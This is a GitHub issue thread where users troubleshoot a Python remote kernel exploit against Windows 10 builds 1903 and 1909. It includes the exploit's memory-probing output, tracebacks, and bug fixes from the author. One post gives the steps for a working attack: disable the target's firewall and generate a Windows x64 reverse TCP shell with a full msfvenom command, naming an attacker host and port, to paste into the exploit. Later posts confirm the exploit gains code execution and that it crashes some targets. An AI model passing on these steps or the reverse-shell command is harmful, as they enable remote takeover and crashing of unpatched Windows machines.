Exploit doesnt work
0xFF1E071F opened this issue · comments
I am using py3.8
host machine linux
target machine win10 b 1903
they are on the same virtual network
I got this error when i am trying to run exploit.py
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff7a180000000
[+] ntoskrnl entry at fffff8054d392010
[+] found PML4 self-ref entry 1e5
[+] found HalpInterruptController at fffff7a1800015b8
Traceback (most recent call last):
File "exploit.py", line 475, in <module>
do_rce(args.ip, args.port)
File "exploit.py", line 438, in do_rce
search_hal_heap(ip, port)
File "exploit.py", line 351, in search_hal_heap
buff = read_physmem_primitive(ip, port, index + i + 0x38)
File "exploit.py", line 205, in read_physmem_primitive
buff = try_read_physmem_primitive(ip, port, phys_addr)
File "exploit.py", line 220, in try_read_physmem_primitive
buff = sock.recv(1000)
socket.timeout: timed out
edit:fix right error
I have this problem,so what should I do
I have this problem,so what should I do
Unfortunately i couldn't find a solution yet :/
nvm, it's a bug. i changed the hal heap search and forgot to update that case. will post a fix shortly
fix for this error has been pushed
Thank you i have another error now:
python exploit.py -ip 192.168.100.146
[+] found low stub at phys addr 13000!
[+] PML4 at 1ad000
[+] base of HAL heap at fffff7e380000000
[+] found PML4 self-ref entry 149
[+] found HalpInterruptController at fffff7e3800015b8
Traceback (most recent call last):
File "exploit.py", line 465, in <module>
do_rce(args.ip, args.port)
File "exploit.py", line 428, in do_rce
search_hal_heap(ip, port)
File "exploit.py", line 356, in search_hal_heap
PHALP_APIC_INTERRUPT = struct.unpack("<Q",buff[i + 0x38:i+0x40])[0]
struct.error: unpack requires a buffer of 8 bytes
OK ppl, if you are reading this dont forget to
- close won 10 b1903/1909 firewall
- run msfvenom as:
msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=192.168.113.121 LPORT=31337 -f python
and change the USER_PAYLOAD with this shellcode.
This code now works on b1903.
And i cannot make it exploit on 1909 machines.
Ok, when i use the exploit on b1909 machines, python code works normally (i mean no error output). But the b1909 machine crashes and reboots.
now works on 1909 thanks